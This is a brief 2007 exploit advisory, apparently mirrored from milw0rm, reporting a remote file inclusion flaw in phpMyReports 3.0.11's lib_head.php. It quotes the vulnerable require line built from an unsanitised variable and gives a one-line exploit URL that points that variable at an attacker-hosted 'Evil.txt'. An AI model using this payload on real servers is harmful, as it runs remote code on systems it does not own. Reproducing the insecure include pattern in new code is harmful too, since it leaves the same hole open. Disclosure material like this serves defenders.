phpMyReports <= 3.0.11 (lib_head.php) Remote File Include Vulnerability

2007-01-29T00:00:00
ID SECURITYVULNS:DOC:15895
Type securityvulns
Reporter Securityvulns
Modified 2007-01-29T00:00:00

Description

================================================================= URL.S = http://www.phpmytools.org/pmr3.0.11_20050105.tar.gz ! ================================================================= Finded by GolD_M = Mahmood_ali && Google.Com ! ================================================================= Greetz For : Tryag-Team & 020 :) ! ================================================================= /include/lib/lib_head.php ! ================================================================= <?php require "$cfgPathModule/my_javascript_inc.php"; ?> ! ================================================================= Exploit ! ================================================================= [path]/include/lib/lib_head.php?cfgPathModule=Evil.txt? ! =================================================================

milw0rm.com [2007-01-27]